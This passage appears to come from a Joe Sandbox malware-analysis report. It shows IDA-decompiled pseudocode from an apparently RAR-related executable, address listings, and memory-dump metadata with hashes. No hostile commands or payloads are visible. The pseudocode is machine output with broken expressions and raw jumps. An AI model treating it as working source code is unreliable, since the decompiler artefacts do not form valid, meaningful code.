				intOrPtr* _t501;
				intOrPtr* _t505;
				void* _t508;
				long long* _t509;
				void* _t511;
				signed long long _t512;
				intOrPtr _t515;
				unsigned long long _t516;
				unsigned long long _t517;
				unsigned long long _t520;
				signed long long _t528;
				void* _t529;
				long long _t536;
				signed long long _t537;
				long long _t539;
				signed long long _t540;
				signed long long _t543;
				void* _t546;
				void* _t547;
				intOrPtr _t549;
				intOrPtr _t550;
				signed long long _t553;
				signed long long _t554;
				void* _t556;
				long long _t557;
				intOrPtr _t558;
				intOrPtr _t561;
				long long _t564;
				void* _t566;
				intOrPtr _t568;
				signed long long _t569;
				void* _t571;
				intOrPtr* _t572;
				signed long long _t573;
				signed long long _t576;

				_t547 = __r11;
				_t470 = __rdx;
				_t410 = __rbx;
				_t378 = _t511;
				 *((long long*)(_t378 + 0x10)) = __rbx;
				 *((long long*)(_t378 + 0x18)) = __rsi;
				 *((long long*)(_t378 + 0x20)) = __rdi;
				_t4 = _t378 - 0x848; // -176
				_t509 = _t4;
				_t512 = _t511 - 0x920;
				_t379 =  *0x50b978f0; // 0x27db226282f1
				_t380 = _t379 ^ _t512;
				 *(_t509 + 0x810) = _t380;
				_t501 = __rcx;
				 *((long long*)(_t512 + 0x60)) = __rcx;
				E00007FF67FF650B164E4(0x69);
				E00007FF67FF650B320B8(__rbx,  *_t501, _t501, _t571);
				 *(_t509 - 0x40) = _t380;
				E00007FF67FF650B52FB8(_t271, _t410,  *_t501, _t470, 0x7fffffff);
				 *(_t509 - 0x68) =  *(_t509 - 0x68) & 0x00000000;
				r12d = 0;
				 *(_t509 - 0x60) = _t553;
				 *(_t509 - 0x58) =  *(_t509 - 0x58) & _t553;
				 *(_t509 - 0x50) =  *(_t509 - 0x50) & _t553;
				 *((intOrPtr*)(_t509 - 0x48)) = r12b;
				_t572 = _t501 + 0x120;
				 *((long long*)(_t512 + 0x70)) = _t572;
				_t18 = _t553 + 1; // 0x1
				r13d = _t18;
				if ( *((intOrPtr*)(_t501 + 0xd8)) - __rdi <= 0) goto 0x50b4f8c6;
				_t381 =  *_t572;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t501 + 0xd0)) + _t410)) != _t381) goto 0x50b4f8b0;
				_t24 = _t509 - 0x68; // -280
				E00007FF67FF650B50CE0( *((intOrPtr*)( *((intOrPtr*)(_t501 + 0xd0)) + _t410 + 8)), _t410, _t24);
				_t495 = __rdi + _t556;
				if (_t495 -  *((intOrPtr*)(_t501 + 0xd8)) < 0) goto 0x50b4f893;
				_t554 =  *(_t509 - 0x60);
				goto 0x50b4f8cb;
				 *((long long*)(_t512 + 0x70)) = _t572;
				_t382 =  <  ? 0xffffffff : _t381;
				E00007FF67FF650B69B9C(_t470, _t529);
				 *(_t512 + 0x68) =  <  ? 0xffffffff : _t381;
				r8d = 0x20;
				E00007FF67FF650B6EEC0(_t410 + 0x10,  *((intOrPtr*)(_t501 + 0x80)),  *((intOrPtr*)(_t501 + 0x88)), _t495, _t501, 0x7fffffff, E00007FF67FF650B50A30, _t556, _t572);
				_t36 = _t509 - 0x80; // -304
				E00007FF67FF650B4DE8C(_t36,  *((intOrPtr*)(_t501 + 0xb0)));
				r10d = 0;
				if ( *((intOrPtr*)(_t501 + 0xb0)) - __r10 <= 0) goto 0x50b4f999;
				r9d = 0;
				_t568 =  *((intOrPtr*)(_t509 - 0x80));
				_t515 =  *((intOrPtr*)(_t501 + 0xa8));
				_t383 =  *_t572;
				if ( *((intOrPtr*)(E00007FF67FF650B50A30 + _t515)) != _t383) goto 0x50b4f984;
				_t516 =  *((intOrPtr*)(E00007FF67FF650B50A30 + _t515 + 8));
				asm("bts ecx, eax");
				 *((_t516 >> 0x00000003 &  *(_t509 - 0x70)) + _t568) =  *((_t516 >> 0x00000003 &  *(_t509 - 0x70)) + _t568) & 0x000000ff;
				_t517 = _t516 >> 0x1e;
				r8d = r8d & 0x00000007;
				asm("inc esp");
				 *((_t517 >> 0x00000003 &  *(_t509 - 0x70)) + _t568) =  *((_t517 >> 0x00000003 &  *(_t509 - 0x70)) + _t568) & 0x000000ff;
				if (__r10 + _t556 -  *((intOrPtr*)(_t501 + 0xb0)) < 0) goto 0x50b4f932;
				_t569 =  *(_t512 + 0x68);
				_t51 = _t509 + 0x10; // -160
				E00007FF67FF650B287D8( *((_t517 >> 0x00000003 &  *(_t509 - 0x70)) + _t568) & 0x000000ff, _t410 + 0x10, _t51, 0x7ff650b50a58, _t547);
				 *(_t512 + 0x4c) = 0;
				r15d = 0x7fffffff;
				 *((intOrPtr*)(_t512 + 0x58)) = r15d;
				if (_t554 == 0) goto 0x50b4fa49;
				_t543 = _t383 * 0x818;
				_t280 =  *( *(_t509 - 0x68) + _t383 * 4);
				 *(_t543 + _t569) = _t280;
				_t236 =  <=  ? 0 : _t280;
				_t313 =  <=  ? 0 : _t280;
				_t281 =  >=  ? r15d : _t280;
				r15d =  >=  ? r15d : _t280;
				 *((char*)(_t543 + _t569 + 0x810)) = 0;
				r8d = 0;
				_t60 = _t569 + 8; // 0x8
				_t333 =  *(_t543 + _t569);
				if (_t333 <= 0) goto 0x50b4fa22;
				r11d =  *(_t543 + _t569);
				if (_t333 != 0) goto 0x50b4fa11;
				 *(_t60 + _t543) =  *(_t509 + 0x10 + _t383 * 8) >> 0x00000008 ^  *(_t509 + 0x10 + _t383 * 8);
				if (_t333 != 0) goto 0x50b4f9fd;
				if (_t383 - _t554 < 0) goto 0x50b4f9c4;
				 *(_t512 + 0x4c) =  <=  ? 0 : _t280;
				 *((intOrPtr*)(_t512 + 0x58)) = r15d;
				E00007FF67FF650B69B9C(_t516 >> 0x00000003 &  *(_t509 - 0x70),  &((_t60 + _t543)[1]));
				_t573 = _t383;
				 *(_t512 + 0x78) = _t383;
				r8d = 0;
				 *0x50b80550(_t508);
				_t536 =  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x60))));
				_t385 =  *((intOrPtr*)( *_t536 + 0x18));
				r8d = 0x400000;
				_t439 = _t536;
				_t557 =  *0x50b80550();
				 *((long long*)(_t512 + 0x30)) = _t557;
				if (_t554 == 0) goto 0x50b4fada;
				_t413 = _t385 * 0x818;
				r8d =  *(_t413 + _t569);
				if (_t557 - _t517 + _t556 < 0) goto 0x50b4facc;
				_t477 = _t573;
				E00007FF67FF650B28658(_t385, _t413, _t439, _t477, _t495, _t517 + _t556, _t566);
				 *(_t413 + _t569 + 0x808) = _t385;
				 *((intOrPtr*)(_t413 + _t569 + 0x810)) = sil;
				if (_t385 - _t554 < 0) goto 0x50b4faa2;
				 *(_t512 + 0x48) =  *(_t512 + 0x48) & 0x00000000;
				 *(_t512 + 0x68) =  *(_t512 + 0x68) & 0x00000000;
				 *(_t512 + 0x40) = _t477;
				 *((long long*)(_t512 + 0x38)) = _t439;
				goto 0x50b4fafe;
				_t558 =  *((intOrPtr*)(_t512 + 0x30));
				_t91 = _t495 + 0x40; // 0x40
				if (_t91 - _t558 >= 0) goto 0x50b4fc14;
				if ( *((char*)(_t495 + _t573)) != 0x7b) goto 0x50b4fc14;
				if ( *((char*)(_t495 + _t573 + 1)) != 0x52) goto 0x50b4fc14;
				if ( *((char*)(_t495 + _t573 + 2)) != 0x42) goto 0x50b4fc14;
				if ( *((char*)(_t495 + _t573 + 3)) != 0x7d) goto 0x50b4fc14;
				if ( *((intOrPtr*)(_t495 + _t573 + 0x14)) != 1) goto 0x50b4fc14;
				if (_t413 + _t439 + _t495 - _t558 >= 0) goto 0x50b4fc14;
				 *((long long*)(_t509 - 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x70))));
				 *_t509 = _t495 + _t477;
				_t392 = E00007FF67FF650B50A30;
				 *((long long*)(_t512 + 0x20)) = E00007FF67FF650B50A30;
				r9d = 0x20;
				_t110 = _t509 - 0x10; // -192
				E00007FF67FF650B7184C(_t413, _t110,  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x60)) + 0x80)), _t495,  *((intOrPtr*)(_t512 + 0x60)), _t509,  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x60)) + 0x88)), _t536);
				if (E00007FF67FF650B50A30 == 0) goto 0x50b4fc14;
				_t496 = _t495 + _t413;
				r13d = 0;
				if (_t554 == 0) goto 0x50b4faf9;
				_t114 = _t392 + 1; // 0x1
				_t414 = E00007FF67FF650B50A30 * 0x818;
				r8d =  *(_t414 + _t569);
				E00007FF67FF650B28658(E00007FF67FF650B50A30, _t414, _t496 + _t573, _t496 + _t573, _t496,  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x60)) + 0x88)), _t556);
				 *((long long*)(_t414 + _t569 + 0x808)) = E00007FF67FF650B50A30;
				 *((intOrPtr*)(_t414 + _t569 + 0x810)) = sil;
				r13d = r13d + _t114;
				if (E00007FF67FF650B50A30 - _t554 < 0) goto 0x50b4fbc6;
				_t505 =  *((intOrPtr*)(_t512 + 0x60));
				goto 0x50b4fafe;
				r10d = 0;
				 *(_t512 + 0x50) = r10d;
				r13b = 0;
				if (_t554 == 0) goto 0x50b4fe3a;
				_t576 =  *(_t512 + 0x68);
				_t127 = _t543 + 1; // 0x1
				r8d = _t127;
				_t537 = E00007FF67FF650B50A30 * 0x818;
				if ( *((char*)(_t537 + _t569 + 0x810)) == 0) goto 0x50b4fdb1;
				_t520 =  *((intOrPtr*)(_t537 + _t569 + 0x808));
				 *(_t509 - 0x30) = _t520;
				_t549 =  *((intOrPtr*)(_t509 - 0x80));
				if (( *((_t520 >> 0x00000003 &  *(_t509 - 0x70)) + _t549) & 0x00000001 << (r8b & 0x00000007)) == 0) goto 0x50b4fdab;
				if (( *((_t520 >> 0x0000001e >> 0x00000003 &  *(_t509 - 0x70)) + _t549) & 0x00000001 << (r8b & 0x00000007)) == 0) goto 0x50b4fdab;
				 *((long long*)(_t509 - 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x70))));
				 *(_t509 - 0x18) =  *(_t537 + _t569);
				 *((long long*)(_t512 + 0x20)) = E00007FF67FF650B509D0;
				r9d = 0x28;
				_t149 = _t509 - 0x38; // -232
				E00007FF67FF650B7184C(_t414, _t149,  *((intOrPtr*)(_t505 + 0xa8)), _t496, _t505, _t509,  *((intOrPtr*)(_t505 + 0xb0)), _t537);
				if (E00007FF67FF650B509D0 == 0) goto 0x50b4fda6;
				_t483 =  *((intOrPtr*)(0x7ff650b509e8));
				_t550 =  *0x7FF650B509E0;
				_t546 =  <=  ? _t550 - _t483 : _t483 - _t550;
				_t539 =  *(_t512 + 0x40) + _t496;
				_t449 =  <=  ? _t550 - _t539 : _t539 - _t550;
				if (_t483 == 0x7fffffff) goto 0x50b4fd32;
				_t356 = ( <=  ? _t550 - _t539 : _t539 - _t550) - _t546;
				if (( <=  ? _t550 - _t539 : _t539 - _t550) - _t546 >= 0) goto 0x50b4fda6;
				 *((long long*)(0x7ff650b509e8)) = _t539;
				r10d =  *(_t509 - 0x18);
				 *(_t512 + 0x50) = r10d;
				if (_t576 == 0) goto 0x50b4fd70;
				if ( *((intOrPtr*)(_t576 + 0x20)) !=  *0x7FF650B509F0) goto 0x50b4fd70;
				if ( *((intOrPtr*)(_t576 + 0x18)) + 0x7fffffff != _t539) goto 0x50b4fd70;
				_t453 =  *((intOrPtr*)(_t576 + 0x10)) + 0x7fffffff;
				if (_t453 != _t550) goto 0x50b4fd70;
				r11d =  *(_t512 + 0x48);
				r11d = r11d + 1;
				goto 0x50b4fd73;
				r11d = 0;
				 *(_t512 + 0x48) = r11d;
				_t257 =  *(_t512 + 0x4c) /  *0x7FF650B509F0 + 1;
				_t258 =  <  ? 5 : _t257;
				r13d = r13b & 0xffffffff;
				_t362 = r11d - ( <  ? 5 : _t257);
				r13d =  >  ? 1 : r13d;
				r8d = 1;
				goto 0x50b4fdb1;
				r10d =  *(_t512 + 0x50);
				r8d = 1;
				if (0x7fffffff - _t554 < 0) goto 0x50b4fc35;
				 *(_t512 + 0x68) = E00007FF67FF650B509D0;
				_t578 =  *(_t512 + 0x78);
				if (r13b == 0) goto 0x50b4fe3a;
				if (r10d == 0) goto 0x50b4fe44;
				_t403 = _t453 +  *((intOrPtr*)(_t512 + 0x38)) + _t496;
				if (_t403 -  *((intOrPtr*)(_t512 + 0x30)) >= 0) goto 0x50b4fe44;
				if ( *((char*)(_t496 +  *(_t512 + 0x78))) == 0) goto 0x50b4fe44;
				_t497 = _t496 + _t453;
				r13d = 0;
				_t177 = _t403 + 1; // 0x1
				_t415 = _t403 * 0x818;
				r8d =  *(_t415 + _t569);
				E00007FF67FF650B28658(_t403, _t415, _t497 + _t578, _t497 + _t578, _t497, E00007FF67FF650B509D0, _t553);
				 *(_t415 + _t569 + 0x808) = _t403;
				 *((intOrPtr*)(_t415 + _t569 + 0x810)) = sil;
				r13d = r13d + _t177;
				if (_t403 - _t554 < 0) goto 0x50b4fe05;
				goto 0x50b4fbf6;
				_t486 =  *((intOrPtr*)(_t512 + 0x38));
				_t561 =  *((intOrPtr*)(_t512 + 0x30));
				if (_t486 + _t497 - _t561 < 0) goto 0x50b4febf;
				_t417 = _t561 - _t497;
				if (_t417 != _t486) goto 0x50b4feaf;
				E00007FF67FF650B5B008();
				E00007FF67FF650B6BAF0();
				 *(_t512 + 0x40) =  *(_t512 + 0x40) + _t561 - _t417;
				r8d = 0x400000;
				_t564 =  *0x50b80550() + _t417;
				 *((long long*)(_t512 + 0x30)) = _t564;
				_t528 =  *(_t509 - 0x40);
				_t457 =  *_t505;
				E00007FF67FF650B52FB8(0 + r8d, _t417, _t457,  *(_t512 + 0x40), _t528);
				if ( *((intOrPtr*)( *((intOrPtr*)( *_t505)) + 0x18)) + _t497 - _t564 >= 0) goto 0x50b4ff3f;
				r10d = 0;
				if (_t554 == 0) goto 0x50b4ff37;
				r8d = 0;
				_t195 = _t546 + 1; // 0x1
				_t540 = _t528 * 0x818;
				r11d =  *(_t540 + _t569);
				if (_t550 + _t497 - _t564 >= 0) goto 0x50b4ff1e;
				 *(_t540 + _t569 + 0x808) =  *(_t569 + 8 + (_t457 + _t528 * 0x103) * 8) ^  *(_t509 + 0x10 + (_t528 * 0x00000103 ^  *(_t540 + _t569 + 0x808)) * 8) ^  *(_t540 + _t569 + 0x808) >> 0x00000008;
				goto 0x50b4ff27;
				 *((char*)(_t540 + _t569 + 0x810)) = 0;
				r10d = r10d + _t195;
				r8d = r10d;
				if (_t528 - _t554 < 0) goto 0x50b4fece;
				goto 0x50b4fc05;
				0x50b69b94();
				0x50b69b94();
				r8d = 0x64;
				E00007FF67FF650B52FB8(0 + r8d, _t417,  *((intOrPtr*)( *((intOrPtr*)(_t512 + 0x60)))),  *(_t540 + _t569 + 0x808) >> 8, _t528);
				0x50b69b94();
				if ( *(_t509 - 0x68) == 0) goto 0x50b4ff97;
				if ( *((char*)(_t509 - 0x48)) == 0) goto 0x50b4ff8e;
				_t269 = E00007FF67FF650B57B7C( *(_t497 + _t497 + _t578) & 0x000000ff, 0, _t322,  *(_t509 - 0x68),  *(_t509 - 0x58) << 2, _t497 + 1);
				0x50b6edd8();
				return E00007FF67FF650B69D10(_t269,  *(_t497 + _t497 + _t578) & 0x000000ff,  *(_t509 + 0x810) ^ _t512);
			}






































































                                                                                                            0x7ff650b4f7f4
                                                                                                            0x7ff650b4f7f4
                                                                                                            0x7ff650b4f7f4
                                                                                                            0x7ff650b4f7f4
                                                                                                            0x7ff650b4f7f7
                                                                                                            0x7ff650b4f7fb
                                                                                                            0x7ff650b4f7ff
                                                                                                            0x7ff650b4f80c
                                                                                                            0x7ff650b4f80c
                                                                                                            0x7ff650b4f813
                                                                                                            0x7ff650b4f81a
                                                                                                            0x7ff650b4f821
                                                                                                            0x7ff650b4f824
                                                                                                            0x7ff650b4f82b
                                                                                                            0x7ff650b4f82e
                                                                                                            0x7ff650b4f838
                                                                                                            0x7ff650b4f840
                                                                                                            0x7ff650b4f845
                                                                                                            0x7ff650b4f858
                                                                                                            0x7ff650b4f85d
                                                                                                            0x7ff650b4f862
                                                                                                            0x7ff650b4f865
                                                                                                            0x7ff650b4f869
                                                                                                            0x7ff650b4f86d
                                                                                                            0x7ff650b4f871
                                                                                                            0x7ff650b4f877
                                                                                                            0x7ff650b4f87e
                                                                                                            0x7ff650b4f883
                                                                                                            0x7ff650b4f883
                                                                                                            0x7ff650b4f88f
                                                                                                            0x7ff650b4f89a
                                                                                                            0x7ff650b4f8a1
                                                                                                            0x7ff650b4f8a7
                                                                                                            0x7ff650b4f8ab
                                                                                                            0x7ff650b4f8b0
                                                                                                            0x7ff650b4f8be
                                                                                                            0x7ff650b4f8c0
                                                                                                            0x7ff650b4f8c4
                                                                                                            0x7ff650b4f8c6
                                                                                                            0x7ff650b4f8da
                                                                                                            0x7ff650b4f8e1
                                                                                                            0x7ff650b4f8e9
                                                                                                            0x7ff650b4f8f5
                                                                                                            0x7ff650b4f909
                                                                                                            0x7ff650b4f915
                                                                                                            0x7ff650b4f919
                                                                                                            0x7ff650b4f91f
                                                                                                            0x7ff650b4f929
                                                                                                            0x7ff650b4f92b
                                                                                                            0x7ff650b4f92e
                                                                                                            0x7ff650b4f932
                                                                                                            0x7ff650b4f939
                                                                                                            0x7ff650b4f940
                                                                                                            0x7ff650b4f942
                                                                                                            0x7ff650b4f95d
                                                                                                            0x7ff650b4f960
                                                                                                            0x7ff650b4f964
                                                                                                            0x7ff650b4f978
                                                                                                            0x7ff650b4f97c
                                                                                                            0x7ff650b4f980
                                                                                                            0x7ff650b4f992
                                                                                                            0x7ff650b4f994
                                                                                                            0x7ff650b4f999
                                                                                                            0x7ff650b4f99d
                                                                                                            0x7ff650b4f9a4
                                                                                                            0x7ff650b4f9a8
                                                                                                            0x7ff650b4f9ae
                                                                                                            0x7ff650b4f9b8
                                                                                                            0x7ff650b4f9c4
                                                                                                            0x7ff650b4f9cb
                                                                                                            0x7ff650b4f9ce
                                                                                                            0x7ff650b4f9d6
                                                                                                            0x7ff650b4f9d9
                                                                                                            0x7ff650b4f9de
                                                                                                            0x7ff650b4f9e2
                                                                                                            0x7ff650b4f9e5
                                                                                                            0x7ff650b4f9ee
                                                                                                            0x7ff650b4f9f1
                                                                                                            0x7ff650b4fa06
                                                                                                            0x7ff650b4fa0b
                                                                                                            0x7ff650b4fa0d
                                                                                                            0x7ff650b4fa20
                                                                                                            0x7ff650b4fa22
                                                                                                            0x7ff650b4fa2f
                                                                                                            0x7ff650b4fa39
                                                                                                            0x7ff650b4fa3b
                                                                                                            0x7ff650b4fa3f
                                                                                                            0x7ff650b4fa50
                                                                                                            0x7ff650b4fa55
                                                                                                            0x7ff650b4fa58
                                                                                                            0x7ff650b4fa67
                                                                                                            0x7ff650b4fa6f
                                                                                                            0x7ff650b4fa75
                                                                                                            0x7ff650b4fa7b
                                                                                                            0x7ff650b4fa7f
                                                                                                            0x7ff650b4fa85
                                                                                                            0x7ff650b4fa8e
                                                                                                            0x7ff650b4fa91
                                                                                                            0x7ff650b4fa9b
                                                                                                            0x7ff650b4faa2
                                                                                                            0x7ff650b4faa9
                                                                                                            0x7ff650b4fab0
                                                                                                            0x7ff650b4fab2
                                                                                                            0x7ff650b4fab7
                                                                                                            0x7ff650b4fabc
                                                                                                            0x7ff650b4fac4
                                                                                                            0x7ff650b4fad3
                                                                                                            0x7ff650b4fada
                                                                                                            0x7ff650b4fadf
                                                                                                            0x7ff650b4fae7
                                                                                                            0x7ff650b4faf2
                                                                                                            0x7ff650b4faf7
                                                                                                            0x7ff650b4faf9
                                                                                                            0x7ff650b4fafe
                                                                                                            0x7ff650b4fb05
                                                                                                            0x7ff650b4fb10
                                                                                                            0x7ff650b4fb1c
                                                                                                            0x7ff650b4fb28
                                                                                                            0x7ff650b4fb34
                                                                                                            0x7ff650b4fb44
                                                                                                            0x7ff650b4fb59
                                                                                                            0x7ff650b4fb67
                                                                                                            0x7ff650b4fb6f
                                                                                                            0x7ff650b4fb73
                                                                                                            0x7ff650b4fb7a
                                                                                                            0x7ff650b4fb7f
                                                                                                            0x7ff650b4fb93
                                                                                                            0x7ff650b4fb97
                                                                                                            0x7ff650b4fb9f
                                                                                                            0x7ff650b4fba1
                                                                                                            0x7ff650b4fba4
                                                                                                            0x7ff650b4fbb4
                                                                                                            0x7ff650b4fbc3
                                                                                                            0x7ff650b4fbc6
                                                                                                            0x7ff650b4fbcd
                                                                                                            0x7ff650b4fbd6
                                                                                                            0x7ff650b4fbdb
                                                                                                            0x7ff650b4fbe3
                                                                                                            0x7ff650b4fbeb
                                                                                                            0x7ff650b4fbf4
                                                                                                            0x7ff650b4fbf6
                                                                                                            0x7ff650b4fc0f
                                                                                                            0x7ff650b4fc14
                                                                                                            0x7ff650b4fc17
                                                                                                            0x7ff650b4fc1c
                                                                                                            0x7ff650b4fc24
                                                                                                            0x7ff650b4fc2c
                                                                                                            0x7ff650b4fc31
                                                                                                            0x7ff650b4fc31
                                                                                                            0x7ff650b4fc35
                                                                                                            0x7ff650b4fc45
                                                                                                            0x7ff650b4fc4b
                                                                                                            0x7ff650b4fc53
                                                                                                            0x7ff650b4fc6f
                                                                                                            0x7ff650b4fc77
                                                                                                            0x7ff650b4fc9a
                                                                                                            0x7ff650b4fca8
                                                                                                            0x7ff650b4fcb0
                                                                                                            0x7ff650b4fcba
                                                                                                            0x7ff650b4fcbf
                                                                                                            0x7ff650b4fcd3
                                                                                                            0x7ff650b4fcd7
                                                                                                            0x7ff650b4fce2
                                                                                                            0x7ff650b4fce8
                                                                                                            0x7ff650b4fcec
                                                                                                            0x7ff650b4fcff
                                                                                                            0x7ff650b4fd08
                                                                                                            0x7ff650b4fd1a
                                                                                                            0x7ff650b4fd2b
                                                                                                            0x7ff650b4fd2d
                                                                                                            0x7ff650b4fd30
                                                                                                            0x7ff650b4fd32
                                                                                                            0x7ff650b4fd36
                                                                                                            0x7ff650b4fd3a
                                                                                                            0x7ff650b4fd42
                                                                                                            0x7ff650b4fd4c
                                                                                                            0x7ff650b4fd58
                                                                                                            0x7ff650b4fd5e
                                                                                                            0x7ff650b4fd64
                                                                                                            0x7ff650b4fd66
                                                                                                            0x7ff650b4fd6b
                                                                                                            0x7ff650b4fd6e
                                                                                                            0x7ff650b4fd70
                                                                                                            0x7ff650b4fd73
                                                                                                            0x7ff650b4fd82
                                                                                                            0x7ff650b4fd8b
                                                                                                            0x7ff650b4fd8e
                                                                                                            0x7ff650b4fd92
                                                                                                            0x7ff650b4fd9a
                                                                                                            0x7ff650b4fda1
                                                                                                            0x7ff650b4fda4
                                                                                                            0x7ff650b4fda6
                                                                                                            0x7ff650b4fdab
                                                                                                            0x7ff650b4fdb9
                                                                                                            0x7ff650b4fdbf
                                                                                                            0x7ff650b4fdc4
                                                                                                            0x7ff650b4fdcc
                                                                                                            0x7ff650b4fddb
                                                                                                            0x7ff650b4fde4
                                                                                                            0x7ff650b4fdea
                                                                                                            0x7ff650b4fdf1
                                                                                                            0x7ff650b4fdf3
                                                                                                            0x7ff650b4fdf6
                                                                                                            0x7ff650b4fe02
                                                                                                            0x7ff650b4fe05
                                                                                                            0x7ff650b4fe0c
                                                                                                            0x7ff650b4fe15
                                                                                                            0x7ff650b4fe1a
                                                                                                            0x7ff650b4fe22
                                                                                                            0x7ff650b4fe2a
                                                                                                            0x7ff650b4fe33
                                                                                                            0x7ff650b4fe35
                                                                                                            0x7ff650b4fe3a
                                                                                                            0x7ff650b4fe3f
                                                                                                            0x7ff650b4fe4b
                                                                                                            0x7ff650b4fe50
                                                                                                            0x7ff650b4fe56
                                                                                                            0x7ff650b4fe58
                                                                                                            0x7ff650b4fe67
                                                                                                            0x7ff650b4fe71
                                                                                                            0x7ff650b4fe7c
                                                                                                            0x7ff650b4fe96
                                                                                                            0x7ff650b4fe99
                                                                                                            0x7ff650b4fe9e
                                                                                                            0x7ff650b4fea7
                                                                                                            0x7ff650b4feaa
                                                                                                            0x7ff650b4feb9
                                                                                                            0x7ff650b4febf
                                                                                                            0x7ff650b4fec5
                                                                                                            0x7ff650b4fec7
                                                                                                            0x7ff650b4feca
                                                                                                            0x7ff650b4fece
                                                                                                            0x7ff650b4fed5
                                                                                                            0x7ff650b4fedf
                                                                                                            0x7ff650b4ff14
                                                                                                            0x7ff650b4ff1c
                                                                                                            0x7ff650b4ff1e
                                                                                                            0x7ff650b4ff27
                                                                                                            0x7ff650b4ff2a
                                                                                                            0x7ff650b4ff30
                                                                                                            0x7ff650b4ff3a
                                                                                                            0x7ff650b4ff42
                                                                                                            0x7ff650b4ff4a
                                                                                                            0x7ff650b4ff54
                                                                                                            0x7ff650b4ff5a
                                                                                                            0x7ff650b4ff69
                                                                                                            0x7ff650b4ff76
                                                                                                            0x7ff650b4ff7c
                                                                                                            0x7ff650b4ff89
                                                                                                            0x7ff650b4ff91
                                                                                                            0x7ff650b4ffc6

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: b1197f47ba99a656a670f1cd0571b0aec424b4da9c73cc6d4236d14e83fe88ea
                                                                                                            • Instruction ID: 6c108b90063e17a8c89ab8fa56cee197d04023e0e8cb5f08144271854531a754
                                                                                                            • Opcode Fuzzy Hash: b1197f47ba99a656a670f1cd0571b0aec424b4da9c73cc6d4236d14e83fe88ea
                                                                                                            • Instruction Fuzzy Hash: DF220532B18A92A6EB54CF25E4806AA77A2FB46784F084135DF8F97794CF3EE550C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B3DBBC Relevance: .5, Instructions: 498COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00007FF67FF650B3DBBC(signed int __ebp, void* __rcx, long long __rdx, long long __r8, void* __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t159;
				signed int _t196;
				void* _t214;
				void* _t215;
				intOrPtr _t216;
				signed int _t217;
				unsigned int _t226;
				intOrPtr _t228;
				intOrPtr _t238;
				signed int _t252;
				signed int _t253;
				void* _t290;
				intOrPtr _t291;
				void* _t292;
				void* _t294;
				void* _t296;
				intOrPtr _t300;
				signed int _t317;
				unsigned int _t343;
				void* _t346;
				void* _t348;
				intOrPtr _t349;
				intOrPtr _t355;
				intOrPtr _t357;
				void* _t358;
				void* _t360;
				signed long long _t362;
				signed long long _t364;
				void* _t385;
				void* _t394;
				signed long long _t410;
				signed long long _t411;
				void* _t434;
				void* _t435;
				void* _t437;
				intOrPtr* _t440;
				signed long long _t441;
				intOrPtr* _t442;
				void* _t443;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t449;
				signed long long _t451;
				void* _t453;
				void* _t454;
				signed long long _t462;
				intOrPtr* _t472;
				void* _t474;
				void* _t475;
				intOrPtr* _t478;
				void* _t482;
				void* _t483;
				intOrPtr _t484;
				void* _t487;
				intOrPtr* _t488;
				void* _t491;
				void* _t492;
				intOrPtr* _t494;

				_t474 = __r11;
				_t348 = _t453;
				 *((intOrPtr*)(_t348 + 0x20)) = r9d;
				 *((long long*)(_t348 + 0x18)) = __r8;
				 *((long long*)(_t348 + 0x10)) = __rdx;
				_t454 = _t453 - 0x68;
				_t435 = __rcx;
				asm("movaps [eax-0x58], xmm6");
				asm("movaps [eax-0x68], xmm7");
				 *((intOrPtr*)(_t454 + 0x30)) = 0;
				 *((intOrPtr*)(_t454 + 0xb0)) = 0;
				r14d = 0;
				if ( *((intOrPtr*)(__rcx + 0x4550)) <= 0) goto 0x50b3de58;
				_t492 = __rcx + 0x4558;
				_t483 = _t492;
				_t440 = (_t437 + 0x55 << 4) + __rcx;
				if ((__ebp | 0xffffffff) == 0xffffffff) goto 0x50b3dc6e;
				r12d =  *((intOrPtr*)(_t440 + 4));
				r12d = r12d - r14d;
				if (r12d <= 0) goto 0x50b3dc66;
				_t215 = __rdx + _t449;
				_t159 = E00007FF67FF650B3D484(_t348, _t358, __rcx, _t215);
				_t416 = r14d +  *((intOrPtr*)( *((intOrPtr*)(_t454 + 0xb8))));
				E00007FF67FF650B6BAF0();
				_t290 = _t215;
				goto 0x50b3dc6e;
				_t478 =  *((intOrPtr*)(_t454 + 0xb8));
				_t13 = _t416 + 0x58; // 0x58
				r8d = _t13;
